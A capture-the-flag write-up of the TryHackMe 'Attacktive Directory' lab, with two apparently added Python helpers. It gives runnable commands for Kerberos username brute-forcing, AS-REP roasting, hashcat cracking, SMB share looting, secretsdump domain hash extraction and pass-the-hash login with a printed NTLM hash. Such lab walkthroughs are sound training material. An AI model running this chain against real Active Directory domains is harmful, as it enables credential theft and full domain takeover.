Exploiting Active Directory — (TryHackMe) THM Attacktive Directory Lab

RUFUS PELIGEY
Published in InfoSec Write-ups
6 min read, Jun 30, 2023

ENUMERATION

We first start by running a masscan on all ports (65535).

sudo masscan -p1-65535 10.10.245.16 --rate=1000 -e tun0 > THM_attacktive_directory

-p = specifies the port range

--rate = specifies the packet rate (packets per second)

-e = specifies the network interface

We used the cat command to view the file.

We wrote a small bash script to automate turning the masscan output into a port list for the next scan.

  1. In icon (1), we store the output of the command in a variable named THM_attacktive_directory.
  2. In icon (2), we reference the file THM_attacktive_directory in which we stored the masscan output.
  3. We use the command-line utility awk for pattern matching at icons (3) and (4) in the image below. Awk lets us use conditional statements to manipulate and process text. In icon (3), we used awk -F " " '{print $4}' to filter the masscan output stored in THM_attacktive_directory (masscan writes one line per result, e.g. "Discovered open port 53/tcp on 10.10.245.16", so the 4th field is the port/protocol pair). After running the command in icon (3), our output will be similar to:

49665/tcp

49679/tcp

53/tcp

Etc…

Note: -F sets the field separator; splitting on white space and printing $4 leaves only the 4th field.

4. In icon (4), -F "/" splits each line on the slash and $1 keeps only the port number. The new output will look like this:

49665

49679

53

5. The tr command-line utility (icon 5) replaces each newline character (\n) with a comma (,). The new output will look like this: 49665,49679,53, etc.

THM_attacktive_directory=$(cat THM_attacktive_directory | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | tr '\n' ',')

We used the cat command to view the content of the variable.
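The same extraction as the awk/tr pipeline above, written in Python as an added example (not from the original write-up): it parses masscan's "Discovered open port" lines, keeps one protocol, de-duplicates and sorts the ports, and joins them without the trailing comma that tr leaves behind. The masscan output below is constructed sample data.

```python
"""Parse masscan output into a de-duplicated port list for nmap's -p option."""
import re

# Constructed sample of masscan's default output format (not real scan data).
SAMPLE_MASSCAN_OUTPUT = """\
Discovered open port 49665/tcp on 10.10.245.16
Discovered open port 49679/tcp on 10.10.245.16
Discovered open port 53/tcp on 10.10.245.16
Discovered open port 53/udp on 10.10.245.16
Discovered open port 445/tcp on 10.10.245.16
Discovered open port 53/tcp on 10.10.245.16
"""

# One result per line: "Discovered open port <port>/<proto> on <host>"
LINE_RE = re.compile(r"^Discovered open port (\d+)/(tcp|udp) on (\S+)$")


def parse_masscan(text, proto="tcp"):
    """Return sorted unique port numbers for `proto` found in masscan output."""
    ports = set()
    for line in text.splitlines():
        match = LINE_RE.match(line.strip())
        if not match:
            continue  # skip banners, blank lines and anything unexpected
        port, line_proto, _host = match.groups()
        if line_proto == proto:
            ports.add(int(port))
    return sorted(ports)


def nmap_port_arg(ports):
    """Join ports as an nmap -p value (no trailing comma, unlike tr '\n' ',')."""
    return ",".join(str(p) for p in ports)


if __name__ == "__main__":
    tcp_ports = parse_masscan(SAMPLE_MASSCAN_OUTPUT)
    print("nmap -Pn -sV -sC -p" + nmap_port_arg(tcp_ports) + " <target>")
```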

Using Nmap, we ran version detection (-sV) and the default Nmap Scripting Engine scripts (-sC) against the ports stored in the THM_attacktive_directory variable.

sudo nmap -Pn -sV -sC -p$THM_attacktive_directory 10.10.245.16

Looking at the output of the Nmap scan, we can see that a lot of ports are open. It is worth noting that ports 80 (HTTP), 88 (Kerberos), 389 (LDAP, filtered), 3268 (LDAP global catalog), 139 (SMB) and 445 (SMB) are open. This combination indicates an Active Directory domain controller. Note the NetBIOS domain name (THM_AD) and the DNS domain name (spookysec.local).

We used kerbrute, a popular enumeration tool that abuses Kerberos pre-authentication on port 88 to brute-force valid Active Directory usernames. We first run the help command.

./kerbrute -h      
./kerbrute userenum --dc 10.10.245.16 -d spookysec.local userlist.txt 

Using kerbrute with the userlist.txt provided by the author of the room, we obtain a list of valid usernames. Note: userlist.txt should be in the same folder as the kerbrute executable.

EXPLOITATION

Now that we have valid user accounts, we perform the AS-REP roasting attack. This attack looks for user accounts that have the "Do not require Kerberos preauthentication" flag (DONT_REQ_PREAUTH) set; for such accounts the KDC returns an AS-REP containing material encrypted with the user's key, which can be cracked offline. We’ll be using a tool from the impacket package called GetNPUsers.py, which searches for user accounts with DONT_REQ_PREAUTH set and requests those AS-REPs.
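An added defender-side check, not part of the original write-up: DONT_REQ_PREAUTH is bit 0x400000 of the userAccountControl attribute (the value GetNPUsers.py queries LDAP for), so an audit of exported account records shows which enabled accounts are AS-REP roastable and what value to write back to clear the bit. The account records below are constructed sample data.

```python
"""Audit userAccountControl values for accounts exposed to AS-REP roasting."""

# userAccountControl bit flags (Microsoft ADS_USER_FLAG values).
ACCOUNTDISABLE = 0x0002
NORMAL_ACCOUNT = 0x0200
DONT_REQ_PREAUTH = 0x400000  # "Do not require Kerberos preauthentication"

# Constructed sample shaped like a flattened LDAP export; not data from the lab.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "svc-admin", "userAccountControl": "4194816"},  # 0x200 | 0x400000
    {"sAMAccountName": "backup", "userAccountControl": "512"},         # 0x200 only
    {"sAMAccountName": "olduser", "userAccountControl": "4194818"},    # disabled + no-preauth
]


def has_flag(uac, flag):
    """True when every bit of `flag` is set in the integer value `uac`."""
    return (uac & flag) == flag


def asrep_exposed(accounts):
    """Names of enabled accounts whose DONT_REQ_PREAUTH bit is set (AS-REP roastable).

    Disabled accounts are excluded: the KDC refuses them, so they cannot be roasted.
    LDAP exports carry userAccountControl as a decimal string, hence the int() call.
    """
    exposed = []
    for account in accounts:
        uac = int(account["userAccountControl"])
        if has_flag(uac, DONT_REQ_PREAUTH) and not has_flag(uac, ACCOUNTDISABLE):
            exposed.append(account["sAMAccountName"])
    return sorted(exposed)


def remediated_uac(uac):
    """Return the userAccountControl value with DONT_REQ_PREAUTH cleared."""
    return uac & ~DONT_REQ_PREAUTH


if __name__ == "__main__":
    for name in asrep_exposed(SAMPLE_ACCOUNTS):
        print(f"{name}: pre-authentication not required, set userAccountControl to "
              f"{remediated_uac(NORMAL_ACCOUNT | DONT_REQ_PREAUTH)}")
```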

We’ll start by looking at the help command;

python3.9 /opt/impacket/examples/GetNPUsers.py -h 

We then run the command below for the notable user accounts (svc-admin and backup) identified earlier and store the output in a text file svc-admin.

python3.9 /opt/impacket/examples/GetNPUsers.py -dc-ip 10.10.245.16 spookysec.local/svc-admin -no-pass | sudo tee svc-admin 

Note: backup@spookysec.local does not have the DON’T_REQ_PREAUTH set.

python3.9 /opt/impacket/examples/GetNPUsers.py -dc-ip 10.10.245.16 spookysec.local/backup -no-pass | sudo tee sbackup

We’ll then search the web for the hashcat mode that cracks this kind of Kerberos hash (Kerberos 5 AS-REP, etype 23).

After identifying the mode, we’ll go ahead to crack the hash using hashcat tool and the command below.

sudo hashcat -m 18200 -a 0 svc-admin /usr/share/wordlists/rockyou.txt --force

After getting a valid password for the account, we try to access the victim machine’s shared folders remotely using smbclient (remember the SMB ports were open in our Nmap scan). Let us run the command:

smbclient -L 10.10.245.16 -U 'svc-admin'

Note: -L lists the shares the server offers.

We’ll then try to access the remote share “backup” using the command below.

smbclient \\\\10.10.245.16\\backup -U 'svc-admin'

Note: each backslash is doubled because the shell treats \ as an escape character; smbclient receives \\10.10.245.16\backup.

Looking at the files inside the backup share, we can see backup_credentials.txt.

Using more to view the file, we can see that its content is base64-encoded.

Using the base64 command-line utility, we decoded the content, which appears to be a password for the backup account.

echo "put_base64_strings_inside_here" | base64 -d

PRIVILEGE ESCALATION

Using secretsdump.py (another tool from impacket) we’ll attempt to dump the domain’s hashes. The usage of secretsdump.py is: secretsdump.py -just-dc <DOMAIN>/<USER>@<DOMAIN_CONTROLLER>

sudo secretsdump.py -just-dc backup@10.10.245.16 

Now that we have the hashes, we’ll apply a technique called pass-the-hash to fully gain access to the victim’s machine. In this technique an attacker gains access without knowing the victim’s password, instead authenticating with the victim’s NTLM hash, which NTLM authentication accepts as a password-equivalent.

To perform this attack (PTH), we’ll use a tool called evil-winrm. The command below shows how you can use the tool.

evil-winrm -i 10.10.245.16 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

Where -i = domain controller IP

-u = domain user

-H = domain user NTLM hash

As the image below shows, we were able to gain access to the Administrator account remotely and navigate the victim’s system to retrieve all the required flags.
